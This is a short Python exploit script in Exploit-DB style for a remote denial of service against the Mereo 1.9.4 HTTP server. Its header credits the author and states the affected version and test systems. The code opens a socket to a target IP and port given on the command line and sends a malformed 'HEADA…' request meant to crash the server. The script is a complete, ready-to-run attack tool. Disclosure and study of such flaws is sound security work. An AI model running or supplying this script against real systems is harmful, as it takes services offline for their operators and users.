#!/usr/bin/python ''' # Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service # Date: 06-2020 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/mereo/ # Software Link: https://sourceforge.net/projects/mereo/files/ # Version: 1.9.4 # Tested on: Windows 7 , Windows Vista # Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is not supported with the application, so it will be caused to crash. Usage: python mereo194_dos.py 1.2.3.4 80 ''' import socket import os import sys if len(sys.argv) != 3: print "Usage: python mereo194_dos.py targetIP targetPort" else: print "[*] Sending evil http request to target" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((sys.argv[1], int(sys.argv[2]))) expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41") expl.close()